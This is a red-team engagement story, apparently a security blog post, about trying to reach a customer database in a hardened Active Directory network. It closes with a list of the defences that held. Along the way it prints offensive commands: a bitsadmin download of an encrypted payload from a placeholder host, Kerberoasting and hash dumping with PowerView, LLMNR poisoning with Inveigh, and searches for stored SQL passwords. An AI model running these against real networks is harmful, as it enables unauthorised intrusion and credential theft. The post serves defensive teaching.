’Twas a Monday morning. A new assessment was about to begin.
I am no fan of Monday mornings, but assessment mornings are pure adrenaline. I woke up a little early that day to double-check if all the assessment infrastructure was up and running. Tea and r/netsec are my morning rituals before leaving home.
On my way to the assessment, I had my Amazon Music (yeah, I know, sue me) tuned to System of a Down radio. It helps me get into the zone. I recommend Aerials; there is something weirdly poetic about that song.
The goal
My goal was straightforward – break into the customer database server without getting caught. I had five days. It was showtime.
It had been a good year. Red teams live and die by their outcomes. And up until then, I had hit nothing but net. There is comfort in the mindset that there is always a way in. I had no reason to believe today would be any different. I was about to learn otherwise.
Getting started
Within an hour, I could remotely control a machine within the organization over the Internet. I had a tried and tested payload that had worked well in the prior months against most perimeter detection solutions.
Excel DDE → starts cmd.exe → launches a download LOLBin (like bitsadmin) → fetches the encrypted payload → loads it in memory → decrypts it → executes → calls back.
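To give a rough idea of the middle of that chain, the LOLBin fetch stage looks something like the sketch below; the URL, job name, and file paths are placeholders, not the actual payload.

```powershell
# Hypothetical sketch of the download stage only. bitsadmin is a signed Windows
# binary (a classic LOLBin), so the fetch rides on legitimate BITS machinery.
# URL and paths below are placeholders.
bitsadmin /transfer updatejob /download /priority normal `
    "https://staging.example.com/blob.bin" "$env:TEMP\blob.bin"

# The next stage would read the encrypted blob, decrypt it, and load it
# reflectively in memory; details intentionally omitted.
```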
I was able to cross the first hurdle with ease.
Day 1 – Chasing the keys to the kingdom
I had access to an account that did not have administrative privileges on my machine or, for that matter, anywhere else. I also had no idea where the database server was.
The obvious strategy was to try and compromise the domain. If I could get the keys to the kingdom, then accessing the database server would only be a matter of time, patience, and persistence.
Right off the bat, I executed what many of us consider a lucky charm these days – Kerberoasting.
A kerberoastable domain admin meant I had a high likelihood of owning the domain by lunchtime.
So thanks to HarmJ0y’s PowerView script, I had a list of kerberoastable accounts and their hashes. Unfortunately, none of them were Domain Admins, Enterprise Admins, or accounts that offered a realistic path to domain compromise.
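For reference, the roasting step with PowerView went roughly like the sketch below; exact function names and parameters differ between PowerView versions, and the file path is illustrative.

```powershell
# Load PowerView (dev branch); path is illustrative
. .\PowerView.ps1

# Accounts with an SPN set, i.e. kerberoastable, plus their group memberships
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname, memberof

# Request service tickets and dump them in a hashcat-friendly format
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash
```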
My heart sank when I got the list of domain admins – just one.
One domain admin is a rarity. The least I had seen before was five. And five is any day better than one (for a red teamer, that is). I ran a quick check of the domain admin properties, and my heart sank further.
Logon restrictions to the domain controllers only! This meant there was no chance of finding the domain admin’s credentials exposed anywhere else.
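The check itself is a couple of LDAP queries. A sketch, assuming the restriction was applied through the account’s “Log On To” (userWorkstations) attribute; the account name is a placeholder:

```powershell
# Who is actually in Domain Admins? (One member, in this case)
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Inspect the lone DA account; "da-account" is a placeholder name.
# A userWorkstations value listing only the DCs means its credentials
# should never land on ordinary workstations or member servers.
Get-DomainUser -Identity "da-account" -Properties samaccountname, userworkstations, memberof
```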
This was going to be more difficult than I thought.
Of the seven kerberoastable accounts, I only managed to crack one.
And as far as I could tell from its group memberships and properties, it did not have access to anything of value. In fact, I could not even reach the machine on which the service was supposedly configured.
I decided to park this route for the time being as it was already past lunchtime on day 1.
The quick hit list
Candidly, I was both annoyed and impressed by how well the accounts with the tasty privileges were locked down. So next up was my trusty quick hit list:
- Local privilege escalation
- UAC bypass
- Misconfigured paths and services
- LLMNR poisoning using Invoke-Inveigh
- GPP
- SMBv1 checks
Nothing. Zilch. Zippo. Nada.
Getting no LLMNR hits struck me as especially weird. Was I on a sparsely populated subnet? A quick local segment scan showed that ports 135 and 445 were locked down. I could only see the RDP port, and there were about 100 live hosts. Maybe I just had to be patient. I decided to keep Inveigh running for a while.
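For context, the poisoning listener was essentially Inveigh left running in the background, along the lines of this sketch (parameter names per the Inveigh versions I have used):

```powershell
# Answer LLMNR/NBNS name lookups and capture any NTLMv2 hashes that arrive.
# LLMNR spoofing is on by default; log to console and to disk.
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -FileOutput Y
```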
Day 2 to 4 – Going Hunting
It was already day 2, and I had nothing to show for my time there.
Though it was time to switch gears and try something else, I could not just go waltzing through the network as it could trip a SIEM rule or the EDR, and I certainly did not want to get caught. Normally, I would take the risk, but experience told me that if someone had locked down the network so well, they knew what they were defending against.
I needed a clear plan of action, with multiple tasks running in parallel. Here’s what I decided to do:
- Spend some time understanding the environment. That meant digging deep into Active Directory.
- Find the IP address and hostname of the database server.
- Figure out what credentials were required to log in to the database server.
- Find the credentials to the database server (somehow!).
- BloodHound the network without using BloodHound, so I could find privilege hopping points.
Lots to do!
While hunting in Active Directory, I did pick up some interesting targets – users who could change passwords, modify attributes, create policies, or RDP to servers; likely workstation and server administrators; and likely DB administrators.
I also found computers that could potentially be my target customer database servers, thanks to SPN scanning and hostname keyword searches for “db”, “sql”, and so on.
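The SPN scanning piece is quiet because it is just LDAP queries from the existing foothold. A sketch, with a hypothetical domain name and hostname patterns I guessed at:

```powershell
# SPN scanning: any computer advertising an MSSQLSvc SPN is running SQL Server,
# discovered purely over LDAP without touching the host
setspn -T corp.example.com -Q MSSQLSvc/*

# Hostname keyword search via PowerView; the "db|sql" pattern is a guess
Get-DomainComputer | Where-Object { $_.dnshostname -match 'db|sql' } |
    Select-Object dnshostname, operatingsystem
```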
I decided to hunt for these users on the network and see if there was a way to compromise them. I ran user hunting and session enumeration scripts, but I could not enumerate any sessions on the DC.
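The hunting itself was standard PowerView fare, something like the sketch below (the group name and DC hostname are placeholders):

```powershell
# Where are the interesting admins logged on right now?
Find-DomainUserLocation -UserGroupIdentity "Server Admins"

# Who has sessions on the DC? (Placeholder hostname)
Get-NetSession -ComputerName dc01.corp.example.com
```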
NetCease? No way. Just no way. The one thing I had counted on, they took from me.
File servers were always a good target for session enumeration. Everyone connects there. But it was a NAS device that everyone was mapped to. No session enumeration was possible.
I felt like I was facing Gandalf.
Just so you know, if someone kills session enumeration on their network, finding user targets becomes a matter of luck, chance, and brute force. It increases your chances of being detected because you have to expand the footprint of your search.
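For anyone unfamiliar: as I understand it, NetCease works by tightening the security descriptor on the registry value that governs who may call NetSessionEnum, so non-admin callers simply get nothing back. The defender-side view:

```powershell
# NetCease edits the ACL stored in this value so that ordinary authenticated
# users can no longer enumerate sessions via NetSessionEnum
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity' -Name 'SrvsvcSessionInfo'
```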
I was suffering because I did not have rights.
You can still enumerate sessions if you are an administrator on the target machine, but I had no admin privileges.
And to top it off, most of the workstations had blocked WMI and SMB. So even BloodHound would come back empty from workstations.
I also found that the workstation computers had LAPS attributes! Local administrator password reuse was out of the question now.
This meant that even if I serendipitously managed to get local admin access on my machine, the local administrator password was useless to me as I couldn’t use it anywhere else!
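Spotting LAPS from a low-privilege account is straightforward: the password attribute (ms-Mcs-AdmPwd) is ACL-protected, but the expiration timestamp usually is not, so its mere presence gives the deployment away. A sketch:

```powershell
# Computers with a populated ms-Mcs-AdmPwdExpirationTime have LAPS managing
# their local admin password: unique per host, rotated, useless for reuse
Get-DomainComputer -Properties dnshostname, 'ms-mcs-admpwdexpirationtime' |
    Where-Object { $_.'ms-mcs-admpwdexpirationtime' } |
    Select-Object dnshostname
```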
Day 5 – Expanding the Search
Last day of the assessment, and I was staring at a bunch of dead ends (a few of the checks are sketched after the list):
- No unconstrained delegation.
- No meaningful credentials from LLMNR poisoning.
- No ASREPRoasting.
- No scope for AdminSDHolder abuses.
- Of all my DB server targets, four were unreachable. The rest did not have default or common passwords.
- No default passwords on any of the popular targets like Tomcat/JBoss/Jenkins that give you code execution.
- Server Admins had a fine-grained password policy requiring 15 characters, so I couldn’t guess passwords either.
- Accounts for administrative use and regular use were split.
- SMB was blocked from my network location towards a big chunk of the server zone, so running enumeration against the servers was difficult.
- A bunch of users I wanted to compromise were in the Protected Users group.
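A few of those checks, roughly as I ran them; all plain PowerView, nothing exotic:

```powershell
# Unconstrained delegation: nothing beyond the DCs themselves
Get-DomainComputer -Unconstrained | Select-Object dnshostname

# ASREPRoasting: no accounts with Kerberos pre-authentication disabled
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# And the users I most wanted were sitting in Protected Users
Get-DomainGroupMember -Identity "Protected Users" | Select-Object MemberName
```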
I did manage to get administrative access to three UAT servers that had “Domain Users” in the administrators group. It seemed like the UAT segment did not have the same rigorous blocks as the production segment.
Two truths and a lie
- At 7:00 pm on day 5, I gave up and called it quits as time was up.
- I went to a bar nearby and had a beer.
- At 5:30 pm on day 5, I got lucky and was able to expand my access to the customer database from the UAT segment by obtaining a backup web.config file that had stored SQL passwords in it.
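In case you are wondering how that last one played out: with local admin on the UAT boxes, it came down to grepping the web roots for configuration files and their backups. The paths and patterns below are illustrative, not the actual ones:

```powershell
# Hunt for config files and backups on a UAT web server, then pull out
# anything that looks like a stored connection string (paths illustrative)
Get-ChildItem -Path 'C:\inetpub\wwwroot' -Recurse -ErrorAction SilentlyContinue `
    -Include 'web.config', '*.config.bak', '*.config.old' |
    Select-String -Pattern 'connectionString' |
    Select-Object Path, Line
```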
Looking back
This story is about all the stuff that was done right.
- Machines were patched against known exploits, and the well-known privilege escalation checks came up empty.
- Powerful privileged groups had restricted membership, and several types of logon restrictions were enforced.
- Fine-grained password policies for key users made password guessing a futile strategy.
- Session enumeration was restricted.
- Administrators of critical servers had additional protections (LSASS protection, Protected Users group, etc.), making it very difficult to steal credentials.
- Administrative use and regular use were split, reducing the surface of credential exposure.
- Lateral movement paths were blocked for the user segment. Lateral movement between endpoints was nearly impossible. WMI / SMB were blocked. RDP was too risky an option.
- Critical servers were not accessible from all locations.
- Default passwords for applications did not work.
Ultimately, I was up against someone who knew how people like me operate. They didn’t do anything too fancy. They just meticulously removed options from my arsenal. And that’s half of what Active Defense is all about.